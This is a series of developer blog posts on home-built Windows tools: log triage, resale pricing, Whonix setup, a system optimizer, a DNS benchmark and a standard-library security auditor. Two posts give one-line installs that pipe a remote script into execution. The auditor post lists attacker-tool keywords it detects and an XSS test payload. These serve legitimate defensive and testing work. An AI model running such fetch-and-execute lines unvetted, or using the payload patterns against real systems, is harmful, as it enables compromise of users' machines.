i don't trust those numbers as a generalization. the corpus is small and i wrote both. but it's enough to say the correlation logic isn't just hallucinating, which is the bar i actually cared about.

configuration and CI use

there's a ~/.threatlens.yaml file for defaults so you don't have to repeat flags. CLI overrides config. you can also ship an allowlist.yaml that suppresses known-good alerts, which matters more than it sounds, because as soon as you point a tool like this at real logs you get drowned in legitimate-but-suspicious-looking activity (admin tooling, scheduled tasks, backup agents).

i ended up adding the allowlist mid-project because i was getting 200 alerts on my own dev box and almost none were real. now they live in YAML and i version-control them per environment.

there's also a --fail-on flag that returns exit code 2 if alerts above a threshold fire. dumb little thing, but it means you can wire ThreatLens into a CI step on a log corpus and have it actually break the build if a regression sneaks in.

what's broken

27 open issues. some of them are real.
sigma cidr modifier as mentioned
the streamlit dashboard exporter occasionally double-counts events when the input is NDJSON with trailing whitespace lines. i thought i fixed it. i didn't.
the follow subcommand (real-time tailing) leaks file handles if you ctrl-C during a log rotation event. found this one in the wild. embarrassing.
EVTX parsing on logs that have been touched by wevtutil epl sometimes desyncs. i think this is upstream but i haven't proved it.

outputs i ship

it can dump to JSON, CSV, HTML, and interactive timelines (one html file with a vis-timeline embed), push to Elasticsearch, Wazuh, or Splunk HEC, and write ATT&CK Navigator layers or STIX 2.1 bundles. the navigator output is the one i use most. you scan, you load the layer, and the heatmap of touched techniques is instantly readable.

what i'd do differently

honestly, i'd write the YAML rule loader first. i wrote the python plugin system first because it was more fun, then bolted YAML on later, and there are seams where the two abstractions don't quite agree. if i rewrote it i'd start at the rule format and make python plugins compile down to the same internal representation.

also i'd write tests earlier. test coverage is maybe 40%. the correlation logic has decent coverage because i kept breaking it. the output formatters basically have none.

repo

https://github.com/TiltedLunar123/ThreatLens

MIT licensed. PRs welcome, issues even more welcome. if you triage logs and have an EVTX file that breaks the parser, i would actually love to see it.

I wrote a PowerShell script to guess my PC's resale value (and learned my depreciation math was wrong)

TiltedLunar123 — Sat, 16 May 2026 09:19:45 +0000

Tried selling my old laptop last month. eBay sold listings were all over the place. Same model, same year, prices ranging from $180 to $420. Some had keyboards with missing keys, some were "great condition, no charger." Useless for getting a real number.

So I built a script. It pulls hardware info out of WMI, looks up parts in a local pricing database, and spits out an estimate. No admin needed. No internet required for the basic run.

Here's where I got it wrong the first time.

The naive version

My first depreciation model was straight linear. Drop 20% the first year, 15% the next, and so on. Simple. Wrong.

When I tested it against actual sold listings, the script came in 25-40% high on anything older than 2 years. Linear decay overstates value because hardware doesn't lose worth on a flat schedule. It loses worth fast in year one (you opened the box, congrats) then slower after that.

What I switched to

Multiplicative decay. Year 1 retains 70% of original. Year 2 multiplies that by 0.80. Year 3 by 0.85. Every year after that by 0.88. Floor at 15% so you never get $0 for a working machine.

function Get-DepreciationMultiplier {
    param([int]$Years)

    if ($Years -le 0) { return 1.0 }

    $value = 0.70
    if ($Years -ge 2) { $value *= 0.80 }
    if ($Years -ge 3) { $value *= 0.85 }
    for ($i = 4; $i -le $Years; $i++) {
        $value *= 0.88
    }

    return [Math]::Max($value, 0.15)
}

A 3-year-old system lands at roughly 48% of its original component total. That tracked with what I was actually seeing on completed eBay sales.
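
For checking the arithmetic, here is the same schedule ported to Python (the script itself is PowerShell). The constants are the ones in the function above and nothing else is added.

```python
def depreciation_multiplier(years):
    """Fraction of original value retained after `years` whole years."""
    if years <= 0:
        return 1.0
    value = 0.70                      # year 1
    if years >= 2:
        value *= 0.80                 # year 2
    if years >= 3:
        value *= 0.85                 # year 3
    for _ in range(4, years + 1):
        value *= 0.88                 # every year from 4 onward
    return max(value, 0.15)           # floor at 15%


for y in (1, 2, 3, 5, 12, 13):
    print(y, round(depreciation_multiplier(y), 3))
```

Year 3 works out to 0.70 x 0.80 x 0.85 = 0.476, which is the "roughly 48%" figure. With these constants the 15% floor first takes effect at year 13, so for most machines being sold it never comes into play.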

Hardware detection

WMI does most of the work.

$cpu = Get-CimInstance Win32_Processor | Select-Object -First 1
$gpu = Get-CimInstance Win32_VideoController | Where-Object { $_.AdapterRAM -gt 0 }
$ram = (Get-CimInstance Win32_PhysicalMemory | Measure-Object Capacity -Sum).Sum / 1GB

Battery is its own thing on laptops. Get-WmiObject -Class BatteryStatus -Namespace root\WMI gives you charge state but not health. For health I parse the output of powercfg /batteryreport which writes an HTML file with design capacity and full charge capacity. Health percentage is the ratio.

That HTML parse is the ugliest part of the script. I used regex against the report because pulling in HtmlAgilityPack felt like overkill for two numbers. It works. If Microsoft changes the report format I'll find out the hard way.

The age problem

Figuring out how old the machine is turned out to be harder than I expected. WMI doesn't expose a clean "manufactured on" date. I tried three sources:

BIOS release date from Win32_BIOS.ReleaseDate. Sometimes accurate, sometimes the BIOS was updated and the date is post-manufacture.
OS install date. Useful only if the original owner never reinstalled.
SMBIOS table parsing. Most accurate. Most annoying to do from PowerShell.

I went with BIOS date as the primary, OS install date as a fallback if the BIOS date is missing or clearly bogus (in the future, before 1995, etc). It's wrong sometimes. Most users sell within a couple years of buying so the error doesn't compound much.
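The fallback rule is small enough to sketch. This is a Python illustration, not the PowerShell from the repo. The 1995 cutoff and the "in the future" check come from the description above. The function names and the whole-years rounding are assumptions.

```python
from datetime import date

EARLIEST_PLAUSIBLE = date(1995, 1, 1)  # cutoff mentioned in the post


def is_plausible(candidate, today):
    """A date is usable if it exists, is not too old, and is not in the future."""
    return candidate is not None and EARLIEST_PLAUSIBLE <= candidate <= today


def pick_build_date(bios_date, os_install_date, today):
    """Prefer the BIOS date, fall back to the OS install date, else None."""
    if is_plausible(bios_date, today):
        return bios_date
    if is_plausible(os_install_date, today):
        return os_install_date
    return None


def age_in_years(build_date, today):
    """Whole years elapsed since build_date (assumed rounding: floor)."""
    years = today.year - build_date.year
    if (today.month, today.day) < (build_date.month, build_date.day):
        years -= 1
    return max(years, 0)


today = date(2026, 5, 16)
chosen = pick_build_date(date(2030, 1, 1), date(2022, 6, 1), today)
print(chosen, age_in_years(chosen, today))
```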

Pricing lookup

The offline pricing database is a JSON file with CPU/GPU model strings mapped to current estimated values. I scraped these once from a hardware pricing site, normalized the model names, and committed it. The script does fuzzy matching because WMI returns CPU strings like "Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz" and my database has "i7-10750H." Levenshtein distance under 5 counts as a match.
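A rough Python sketch of that matching step follows. One assumption is baked in: the raw WMI string is far longer than a database key like "i7-10750H", so this version compares each whitespace-separated token against the keys instead of the whole string. `candidate_tokens` and `best_match` are hypothetical names, and the real script may normalize differently.

```python
import re


def levenshtein(a, b):
    """Classic dynamic-programming edit distance, one row at a time."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            current.append(min(previous[j] + 1,          # deletion
                               current[j - 1] + 1,       # insertion
                               previous[j - 1] + cost))  # substitution
        previous = current
    return previous[-1]


def candidate_tokens(wmi_name):
    """Drop (R)/(TM) markers and split the WMI string into tokens."""
    cleaned = re.sub(r"\((?:R|TM)\)", " ", wmi_name, flags=re.IGNORECASE)
    return cleaned.split()


def best_match(wmi_name, known_models, max_distance=4):
    """Return the closest database key with distance under 5, else None."""
    best = None
    for token in candidate_tokens(wmi_name):
        for model in known_models:
            distance = levenshtein(token.lower(), model.lower())
            if distance <= max_distance and (best is None or distance < best[1]):
                best = (model, distance)
    return best[0] if best else None


print(best_match("Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz",
                 ["i5-8250U", "i7-10750H"]))
```

A threshold this loose also accepts neighbouring models ("i7-10750H" and "i7-10710U" are only two edits apart), so picking the smallest distance rather than the first hit matters.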

The eBay check is optional and slow. It hits the sold listings API, pulls the last 30 results for a query like "$cpu $gpu $ram", filters out wrecks (titles containing "broken," "parts," "no power"), and averages the middle 50% to drop outliers.
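The filter-then-trim step looks roughly like this in Python. The wreck keywords are the ones listed above. The `(title, price)` tuple shape and the function names are assumptions for the sketch, and no eBay API call is shown.

```python
WRECK_WORDS = ("broken", "parts", "no power")  # keywords from the post


def is_wreck(title):
    """True if the listing title contains any wreck keyword."""
    lowered = title.lower()
    return any(word in lowered for word in WRECK_WORDS)


def middle_half_mean(prices):
    """Average the middle 50% of prices, dropping the top and bottom quarter."""
    ordered = sorted(prices)
    if not ordered:
        return None
    cut = len(ordered) // 4
    middle = ordered[cut:len(ordered) - cut]
    return sum(middle) / len(middle)


def estimate(listings):
    """listings: iterable of (title, sold_price) pairs."""
    prices = [price for title, price in listings if not is_wreck(title)]
    return middle_half_mean(prices)


sample = [
    ("Dell laptop i7", 180.0),
    ("Dell laptop for parts", 40.0),
    ("Dell laptop", 300.0),
    ("Dell laptop great condition", 320.0),
    ("Dell laptop BROKEN screen", 60.0),
    ("Dell laptop mint", 420.0),
]
print(estimate(sample))
```

Plain substring matching is blunt: a title like "spare parts included" gets dropped too.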

What's broken

Desktop GPU detection is messy when there's an integrated and a discrete card. I take the one with more VRAM but that's hacky.
No support for AMD APUs as a single unit. The script treats the CPU and GPU separately even though they're the same chip.
The pricing database goes stale fast. I update it manually every few months. Should probably write a scraper.
It assumes Windows. PowerShell 7 runs on Linux, but Get-CimInstance and powercfg are Windows-only, so a port would need a different hardware detection layer. I haven't tried.

What I'd do differently

If I were starting over I'd skip the JSON pricing database and hit the eBay API every time, with a 24-hour cache. Maintaining the offline DB is the worst part of this project and the eBay numbers are more accurate anyway. The "offline" feature sounded cool when I started. In practice I always run with -UseEbay enabled.

Code is on GitHub. PowerShell 5.1 ships with Windows so there's nothing to install.

https://github.com/TiltedLunar123/pc-worth

Setting up Whonix on Windows without clicking through 30 VirtualBox dialogs

TiltedLunar123 — Thu, 14 May 2026 09:13:32 +0000

Whonix gives you Tor isolation by routing one VM's traffic through another. Gateway VM handles Tor. Workstation VM does the actual work. If the Workstation gets compromised, your real IP doesn't leak because it can only talk to the Gateway.

Setting it up by hand is tedious. Download VirtualBox, download two OVA files, import them, configure network adapters, allocate RAM, disable USB and audio, boot Gateway, wait for Tor, then boot Workstation. Miss a step and your isolation is broken.

I wrote a PowerShell project that does the whole thing.

What it actually does

Four scripts run in order:

.\prereq-check.ps1
.\setup.ps1
.\configure-vms.ps1
.\start-whonix.ps1

prereq-check.ps1 validates RAM, CPU cores, disk space, and whether VT-x or AMD-V is enabled. It fails fast if your machine can't run two VMs.

setup.ps1 pulls the right VirtualBox version and the two Whonix OVAs (Gateway and Workstation), then verifies SHA-512 hashes before importing. If a download is tampered with mid-flight, the install stops there.

configure-vms.ps1 sets the security defaults. USB controllers off, audio off, 3D acceleration off, nested virtualization off. Clipboard sharing limited to host-to-guest. Gateway gets a fixed 1 CPU and 1 GB of RAM because Tor doesn't need more, and anything extra is wasted memory. Workstation gets 25 to 40 percent of available RAM depending on what the host can spare.

start-whonix.ps1 boots Gateway first, waits for Tor to come up, then boots Workstation.

The startup ordering thing

This is the part that took the longest to get right.

You can't just boot both VMs at once. The Workstation's only network route is through the Gateway. If the Workstation comes up before Tor finishes bootstrapping inside the Gateway, the Workstation has no DNS, no connectivity, nothing. Some apps will time out and stay broken until you restart them.

My first attempt was a hardcoded sleep. Wait 90 seconds after starting Gateway, then start Workstation. It worked on my fast machine. On a slower one it didn't. Sometimes Tor took 3 minutes to bootstrap.

The fix was to poll. After Gateway boots, the script opens a TCP connection to the Gateway's Tor SocksPort. If it connects, Tor is ready. If it refuses or hangs, keep waiting. There's a timeout at 5 minutes because if Tor hasn't bootstrapped by then something else is wrong.

The check is dumb but reliable:

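# One connection attempt to the Gateway's SocksPort with a 2-second timeout.
$tcpClient = New-Object System.Net.Sockets.TcpClient
try {
    $connect = $tcpClient.BeginConnect($gatewayIP, 9050, $null, $null)
    $wait = $connect.AsyncWaitHandle.WaitOne(2000, $false)
    if ($wait -and $tcpClient.Connected) { return $true }
} finally { $tcpClient.Close() }   # release the socket on every attempt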

Wrapped in a retry loop with a small delay between attempts.
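The retry loop around that check can be sketched in Python like this. It is an illustration, not the script's PowerShell. The 2-second attempt timeout and 5-minute ceiling come from the post. The 3-second delay and the function names are assumptions. A successful connect only proves the port is accepting connections, which is the readiness signal the post uses.

```python
import socket
import time


def port_is_open(host, port, attempt_timeout=2.0):
    """One TCP connect attempt; True if the port accepts the connection."""
    try:
        with socket.create_connection((host, port), timeout=attempt_timeout):
            return True
    except OSError:  # refused, unreachable, or timed out
        return False


def wait_for_port(host, port, deadline_seconds=300.0, delay=3.0,
                  attempt_timeout=2.0):
    """Poll until the port opens or the overall deadline passes."""
    deadline = time.monotonic() + deadline_seconds
    while True:
        if port_is_open(host, port, attempt_timeout):
            return True
        if time.monotonic() + delay > deadline:
            return False
        time.sleep(delay)
```

Usage would be something like `wait_for_port(gateway_ip, 9050)` before starting the Workstation, where `gateway_ip` is whatever address the Gateway answers on in your setup.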

Version pinning

The other thing I wanted was reproducibility. If I deploy this on three machines, I want the exact same VirtualBox version and the exact same Whonix images on all of them.

Whonix releases change. So does VirtualBox. So the script takes pinned version parameters with their expected hashes:

.\setup.ps1 -WhonixVersion "18.1.4.2" -WhonixHash "sha512:abc..."

If you don't pass them, it uses a default set that's known to work. If you pass a version, you also pass the hash, and the script refuses to run if the download doesn't match. This is annoying when versions change because I have to update the defaults. But it means a stale clone of the repo won't silently pull a different image.
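The hash gate itself is only a few lines. Below is a minimal Python sketch of the same idea, assuming the pinned value has the form `sha512:<hex digest>` as in the example parameter above. `sha512_of_file` and `matches_pinned_hash` are hypothetical names, not functions from the repo.

```python
import hashlib
import hmac


def sha512_of_file(path, chunk_size=1024 * 1024):
    """Hash the file in chunks so a multi-gigabyte OVA never sits in memory."""
    digest = hashlib.sha512()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_pinned_hash(path, pinned):
    """Compare a downloaded file against a 'sha512:<hex>' pin."""
    algorithm, _, expected = pinned.partition(":")
    if algorithm.lower() != "sha512" or not expected:
        raise ValueError("expected a value of the form sha512:<hex digest>")
    actual = sha512_of_file(path)
    return hmac.compare_digest(actual, expected.strip().lower())
```

The caller would refuse to import the image whenever `matches_pinned_hash` returns False.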

Security defaults

A lot of the configure step is just turning things off. USB passthrough off, because a compromised workstation shouldn't be able to read your USB drives. Audio off, same reason. 3D acceleration off, because the graphics passthrough has had escape bugs before. Nested virtualization off, because the Workstation shouldn't be spinning up its own VMs.

Clipboard sharing is set to host-to-guest only, not bidirectional. Drag and drop is disabled. Shared folders are not configured by default. If you want any of these you have to turn them on yourself, which is the point.

None of this is novel. The Whonix docs recommend most of these settings. The script just makes sure I don't forget one.

What's still broken

It only works on Windows. PowerShell itself runs everywhere, but the VBoxManage paths and registry checks are Windows-specific. Linux users have their own tooling for this already.

It doesn't handle the case where VirtualBox is already installed but with a mismatched version. Right now it just warns. I should add a flag to force-upgrade or skip.

And the prerequisites check is conservative. It refuses to run on machines with less than 8 GB of RAM, but Whonix technically runs on 4 GB if you're patient. Someone with a low-end machine asked me to add an override and I haven't yet.

Repo

github.com/TiltedLunar123/WhonixAutoSetup

The README has the full parameter list and a few troubleshooting notes for when the Tor bootstrap fails. If you run it and something breaks, the issue tracker is open.

I built a Windows optimizer that refuses to run if Outlook is open

TiltedLunar123 — Wed, 13 May 2026 09:23:30 +0000

I wrote a PowerShell script that hardens and tunes Windows 10/11. Pretty standard stuff. Disables telemetry, kills bloatware, tweaks the registry for performance, hardens a few obvious holes (SMBv1, AutoRun, Remote Desktop if you don't use it).

Writing those tweaks isn't hard. The hard part is what happens when you run a script like that on a machine someone is actually using.

My first version was clean. Smooth even. Then I ran it on my dad's laptop while he was on a Zoom call. The script disabled a couple of audio services it thought were unused. Mic cut out mid-meeting. He was not impressed.

That was the moment I added context-aware safety.

Now before the script touches anything, it scans for running processes and connected hardware that would care. Outlook running? Skip the network resets. RDP session active? Don't touch firewall rules. Touchscreen detected? Leave the tablet input services alone. Print job queued? Don't kill the spooler.

It's a stupid amount of edge-case logic for a script people will run once. But it's the difference between "optimizer" and "incident."

Here's roughly how the privacy module handles it:

function Invoke-PrivacyOptimization {
    param([switch]$DryRun)

    $context = Get-RuntimeContext

    $changes = @{
        'AllowTelemetry' = 0
        'AllowCortana'   = 0
        'AdvertisingId'  = 0
    }

    # Drop only the Cortana tweak when Cortana is in use; the rest still apply.
    if ($context.Skip -contains 'Cortana-active') {
        Write-Log "Cortana in use, skipping Cortana disable"
        $changes.Remove('AllowCortana')
    }

    foreach ($key in $changes.Keys) {
        if (-not $DryRun) {
            # Record the previous value before overwriting it.
            Save-UndoEntry -Name $key
            Set-RegistryValue -Name $key -Value $changes[$key]
        }
    }
}

The undo logic is what I'm most proud of. Every registry change writes the previous value to a JSON file in %LOCALAPPDATA%\UWSO\ with restricted ACLs (so a non-admin user on the box can't tamper with the rollback). If anything breaks, you run the script with -Undo and it restores every value from the most recent run.

The catch I didn't see coming: some registry keys don't exist until you set them. So the "previous value" is null. If you blindly restore null, you delete the key entirely. Sometimes that's fine. Sometimes you've just removed a default that Windows would have created on demand, and now an app behaves oddly because that key being absent means something specific. I ended up adding a flag in the undo file marking whether the original key existed or not. Boolean, not the worst code I've ever written, but it took me a full afternoon to figure out why some restores were leaving the system in a weirder state than before the optimizer ran.
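Here is the "did it exist" flag as a minimal Python sketch. A plain dict stands in for the registry, and the entry shape and function names are assumptions. The real script is PowerShell and its JSON layout may differ.

```python
import json


def make_undo_entry(registry, name):
    """Capture the old value AND whether the value was present at all."""
    return {
        "name": name,
        "existed": name in registry,
        "value": registry.get(name),
    }


def restore(registry, entry):
    """Put back the old value, or remove the value if it never existed."""
    if entry["existed"]:
        registry[entry["name"]] = entry["value"]
    else:
        registry.pop(entry["name"], None)


# A dict stands in for the registry; one value is present but empty.
registry = {"AllowTelemetry": 3, "EmptyButPresent": None}
names = ["AllowTelemetry", "EmptyButPresent", "AdvertisingId"]

undo_file = json.dumps([make_undo_entry(registry, n) for n in names])
for n in names:
    registry[n] = 0  # the optimizer's change

for entry in json.loads(undo_file):
    restore(registry, entry)
print(registry)
```

Without the flag, "EmptyButPresent" and "AdvertisingId" both record null as their old value, and the restore has no way to tell which one to delete and which one to write back.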

I also added a health score. It's a 0-100 number based on services running, telemetry endpoints reachable, disk type vs. configured caching, firewall posture, and a few other things. Mostly it's there so the user has a before/after to look at. Nobody trusts a script that just says "done." They want a number that went up.

What's still rough:

The detection for "active session" is shallow. I'm checking process names. If you renamed Outlook.exe to something custom or you're running a different mail client, the script wouldn't notice. A real solution would hook into Windows session APIs and check what's holding open file handles or audio endpoints. I'm not there yet.

Gaming tweaks are mostly hard-coded. The script enables Game Mode and disables Game DVR if it sees a discrete GPU. Should probably check whether the user actually games. Right now if you have a 4090 and only use the machine for Excel, it'll still flip those bits. Harmless, mostly, but annoying that it lies a little on the report.

The hardware tier classifier is fragile. I divide systems into rough buckets based on CPU/RAM/storage type. The thresholds are arbitrary numbers I picked after testing on six machines. Probably wrong for anything outside that range. If you run it on a Surface tablet or a Steam Deck booted into Windows, results may be funky.

The SSD-specific tweaks (disabling Prefetch/Superfetch, ensuring TRIM is on) only fire if it detects an NVMe or SATA SSD via the storage cmdlets. Hybrid drives confuse it. I have one in a backup laptop and it always classifies it wrong.

If you want to try it, install is one line:

irm https://raw.githubusercontent.com/TiltedLunar123/Ultimate-Windows-System-Optimizer/main/run.ps1 | iex

Run it with -DryRun first. Always. The dry-run mode prints every change it would make without touching anything. I use this on every fresh machine before letting it commit. You can also do -Only "Privacy","Cleanup" to scope it to a few modules, or -Skip "Gaming" to leave specific stuff alone.

If it ever does something you don't like, -Undo will pull the most recent rollback file from %LOCALAPPDATA%\UWSO\ and put things back. The rollback files are plain JSON. You can read them, edit them, or delete them if you want a clean slate.

Repo and full module list here: https://github.com/TiltedLunar123/Ultimate-Windows-System-Optimizer

Issues and PRs welcome. Especially if you have a weird hardware setup that breaks the tier classifier. I want to know.

I tested 17 DNS resolvers from my apartment so you don't have to

TiltedLunar123 — Tue, 12 May 2026 09:16:37 +0000

i kept seeing "just use 1.1.1.1" and "switch to quad9 for security" in every networking thread, and nobody ever showed numbers. so i wrote a powershell script that actually benchmarks all of them on my machine and picks one based on weighted scoring.

repo: https://github.com/TiltedLunar123/DNS-Benchmark

the problem

my ISP's default DNS resolves twitter.com in ~38ms. cloudflare claims sub-15ms globally. is that real from comcast in metro detroit at 11pm? i had no idea. every "best DNS" article is the same five recommendations with no measurements behind them.

the existing tools i tried either:

only test latency (ignores reliability, ignores DNSSEC support)
need GUI clicks (i wanted something i could run from a script on a fresh windows install)
pick winners with no visible methodology

so i built one.

what it does

it pulls the active network adapter, runs queries against 17 public resolvers across 10 test domains, scores them, and offers to apply the winner. with a backup so you don't brick your DNS at 2am.

the 17 providers cover the main families: cloudflare (three variants including malware and family filtering), google, quad9 (filtered + unfiltered), opendns, adguard, comodo, cleanbrowsing, mullvad, control d, neustar, level3. enough to actually represent the space, not just three vendors.

the scoring choice that took me too long

i kept flip-flopping on weights. first attempt was pure latency. then i ran it a few times and noticed quad9 would win one run, cloudflare the next, depending on which domain happened to be hot in cache. so consistency had to matter.

settled on:

speed 40%
reliability 25% (% of queries that actually resolved without timeout)
security 25% (DNSSEC support, malware blocking, no logging claims)
consistency 10% (low jitter across runs)

the security score is partially hardcoded from each provider's published policy, which i'm not thrilled about. i don't have a great way to verify "no logging" claims from a script. open to suggestions there.
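a rough python sketch of how those weights combine. the weights are the ones above. the normalization (mapping latency and jitter onto 0..1 with fixed best/worst bounds) is an assumption, and so are the function names. the actual script is powershell and may scale things differently.

```python
WEIGHTS = {
    "speed": 0.40,
    "reliability": 0.25,
    "security": 0.25,
    "consistency": 0.10,
}


def lower_is_better(value, best, worst):
    """Map a measurement onto 0..1 where `best` scores 1 and `worst` scores 0."""
    if worst <= best:
        return 1.0
    clamped = min(max(value, best), worst)
    return (worst - clamped) / (worst - best)


def total_score(latency_ms, success_rate, security, jitter_ms,
                latency_range=(5.0, 100.0), jitter_range=(0.0, 20.0)):
    """Weighted 0..100 score. success_rate and security are already 0..1."""
    parts = {
        "speed": lower_is_better(latency_ms, *latency_range),
        "reliability": success_rate,
        "security": security,
        "consistency": lower_is_better(jitter_ms, *jitter_range),
    }
    return 100.0 * sum(WEIGHTS[name] * parts[name] for name in WEIGHTS)


# made-up numbers: a 2 ms latency gap vs a larger security gap
fast_less_secure = total_score(12.0, 1.0, 0.6, 2.0)
slower_more_secure = total_score(14.0, 1.0, 0.9, 2.0)
print(round(fast_less_secure, 1), round(slower_more_secure, 1))
```

with a 25% security weight, a couple of milliseconds of latency doesn't outweigh a meaningful gap in the security component, which is why the hardcoded security numbers matter so much.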

the install line

irm https://raw.githubusercontent.com/TiltedLunar123/DNS-Benchmark/master/install.ps1 | iex

yes, irm | iex is the powershell equivalent of curl | bash and yes you should read the script before running it. the install.ps1 is under 100 lines. takes about 30 seconds to skim.

sample output

results come back as letter grades, A+ through F, with the top 3 starred. cloudflare 1.1.1.1 won on my home connection but quad9 came within 2ms and scored higher on security weighting. it was closer than the internet would have you believe.

what's broken

it assumes you have admin. if you don't, it fails late instead of checking up front. fixing.
the 10 test domains are hardcoded. should probably read from a config file or accept a -Domains param.
no ipv6 support yet. on the list.
jitter analysis uses standard deviation which is fine for normal cases but gets weird when a provider has one big outlier query. probably should use median absolute deviation.
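to show why the outlier case matters, here's a small python comparison of standard deviation against median absolute deviation. the latency samples are made up for illustration and `median_absolute_deviation` is a hypothetical helper, not something in the repo.

```python
import statistics


def median_absolute_deviation(samples):
    """Median of the absolute distances from the median."""
    center = statistics.median(samples)
    return statistics.median(abs(x - center) for x in samples)


# five steady queries and one slow outlier (illustrative numbers)
latencies_ms = [12.0, 13.0, 12.0, 14.0, 13.0, 250.0]

print("stdev:", round(statistics.stdev(latencies_ms), 1))
print("MAD:  ", median_absolute_deviation(latencies_ms))
```

one slow query drags the standard deviation up to nearly 100 ms, while the MAD stays at 1 ms and still describes how the resolver behaves on a typical query.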

flags supported: -TestCount, -SkipApply, -Report (markdown out), -Restore (back to your previous DNS if the new one feels wrong).

the thing i actually learned

the "best DNS" depends way more on your geographic distance to the resolver's anycast nodes than on the brand. mullvad scored surprisingly high for me, probably because their detroit-area peering is good. i would never have guessed that without measuring.

if you run it on your network and get a different winner, that's the point.

repo's MIT, PRs welcome, especially anyone who knows the right way to verify logging policies from a script. https://github.com/TiltedLunar123/DNS-Benchmark

Auditing Windows security from a Python script, no pip install needed

TiltedLunar123 — Sun, 10 May 2026 09:17:16 +0000

I had a problem. I wanted a Windows security audit script I could drop on any machine, run as admin, and walk away with a readable report. Just a single .py file. No pip install, no virtualenv, no "wait, do you have Python 3.10 or what."

The catch is that "real" Windows auditing tools usually pull in pywin32, wmi, or some chunky vendor SDK. None of that flies on a locked down workstation. So I tried writing the whole thing on the standard library.

That is what WinRecon turned into. 20 checks, single Python module, no dependencies past stdlib.

Here's how the dependency-free constraint shaped the architecture.

For registry reads I went straight to winreg. Anything that needs Windows tooling goes through subprocess with the actual built-in binaries (netstat, net, sc query, wmic, and PowerShell for Defender and audit policy queries). It is not elegant. You end up parsing CLI text output a lot. But it works on a fresh Windows 11 box with nothing installed.

Example. Getting Defender status without pywin32. PowerShell already returns it as JSON, you just have to ask:

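import json
import subprocess

def get_defender_status():
    # Ask PowerShell for Defender status as JSON; return None if the call fails.
    cmd = [
        "powershell", "-NoProfile", "-Command",
        "Get-MpComputerStatus | ConvertTo-Json"
    ]
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
    except (OSError, subprocess.TimeoutExpired):
        return None
    if result.returncode != 0:
        return None
    return json.loads(result.stdout)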

Subprocess plus ConvertTo-Json got me out of a hole on probably half the checks. WMI bindings would have been faster but the trade is dependencies, and I wanted the script to just run.

The 20 checks cover the obvious stuff (firewall state, RDP config, password policy, open ports, BitLocker, Credential Guard, Secure Boot, audit policy, antivirus status) plus the stuff a SOC analyst actually wants to see: suspicious scheduled tasks, sketchy startup entries, weird PowerShell flags. The scheduled task check looks for things like encoded payloads (-enc, frombase64string), LOLBins (certutil, bitsadmin, regsvr32), -windowstyle hidden, IEX, and C2 indicators like ngrok or pastebin URLs. Cheap pattern matching but it catches the lazy stuff.

Output is a self-contained HTML report. All CSS inlined, no external assets. You can email it, drop it on a fileshare, open it on a stripped down server, and it renders. There is also a JSON file for anyone who wants to parse findings into a SIEM later.

Scoring is dumb on purpose. Each finding is CRITICAL (-20), WARNING (-10), or PASS/INFO (0). Start at 100, deduct, end with a letter grade A through F. The point is not "is this CVSS-accurate." The point is that you can hand the HTML to a non-security person and they get it in three seconds.
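As a sketch, the whole scoring model fits in a few lines of Python. The penalties are the ones stated above. The grade cutoffs and the clamp at zero are assumptions, picked so that a single critical (score 80) comes out as a C. WinRecon's real thresholds may differ.

```python
PENALTY = {"CRITICAL": 20, "WARNING": 10, "PASS": 0, "INFO": 0}

# Hypothetical cutoffs: (minimum score, letter). Anything lower is an F.
GRADE_FLOORS = [(95, "A"), (85, "B"), (70, "C"), (55, "D")]


def score(statuses):
    """Start at 100 and deduct per finding, never dropping below 0."""
    total = 100 - sum(PENALTY[status] for status in statuses)
    return max(total, 0)


def grade(points):
    """Translate a 0..100 score into a letter."""
    for floor, letter in GRADE_FLOORS:
        if points >= floor:
            return letter
    return "F"


one_critical = ["CRITICAL"] + ["PASS"] * 19
print(score(one_critical), grade(score(one_critical)))
```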

What broke along the way.

The biggest pain was admin vs standard user. Some checks (BitLocker, audit policy, credential guard, firewall details) just fail or return degraded results without elevation. I wanted them to fail loudly without crashing the whole run, so each check returns a Finding object with status PASS, WARNING, CRITICAL, or INFO, and the runner aggregates them. If one check explodes, the others still finish. Took me a couple iterations to stop having one bad subprocess timeout kill the whole report.
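The isolation pattern is roughly the following. This is a simplified sketch, not the actual WinRecon runner: the two-field `Finding` and the choice to report a crashed check as a WARNING are assumptions.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    status: str   # PASS, WARNING, CRITICAL, or INFO
    message: str


def run_checks(checks):
    """Run every (name, callable) pair; one failure never stops the rest."""
    findings = []
    for name, check in checks:
        try:
            findings.append(check())
        except Exception as exc:  # timeouts, access denied, parse errors
            findings.append(
                Finding("WARNING", f"{name}: check failed to run ({exc})")
            )
    return findings


def broken_check():
    raise TimeoutError("subprocess took longer than 60s")


results = run_checks([
    ("firewall", lambda: Finding("PASS", "firewall enabled on all profiles")),
    ("bitlocker", broken_check),
    ("rdp", lambda: Finding("INFO", "RDP is disabled")),
])
for finding in results:
    print(finding.status, finding.message)
```

Turning the exception into a finding keeps the failure visible in the report instead of silently dropping the check.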

The other thing I underestimated: HTML escaping. All those scheduled task names and registry values go straight into the report. If a malicious task name had <script> in it, my report would happily render it. So I added pytest coverage specifically for the escape path, and a test that drops <img src=x onerror=alert(1)> into a finding to make sure it comes out as text. Coverage is at 80% min, which feels right for a tool you might run on a real machine.
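The escape path boils down to running every untrusted string through `html.escape` before it reaches the template. A minimal sketch, with `render_finding_row` as a hypothetical stand-in for the real report code:

```python
import html


def render_finding_row(name, detail):
    """Build one table row, escaping both untrusted strings."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(name), html.escape(detail)
    )


row = render_finding_row("<img src=x onerror=alert(1)>", "task found in startup")
print(row)
```

The payload comes out as `&lt;img src=x onerror=alert(1)&gt;`, which the browser shows as text instead of parsing as a tag.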

Things I would still fix.

The grading is too coarse. A box with one critical finding and 19 passes lands a C. That is fine for "is this safe" but it overweights single critical findings. I want to weight them by category eventually, so missing antivirus doesn't cost the same as SMBv1 still being enabled.

Subprocess timeouts also have a default of 60s per check, which is fine on a normal machine and miserable on a slow domain-joined one. I should make them adaptive.

The suspicious-pattern detector is regex on strings, which means false positives. A scheduled task named "regsvr32-cleanup" gets flagged. The custom keywords file partially fixes this but I should ship a default trusted-paths list that covers common vendor software.

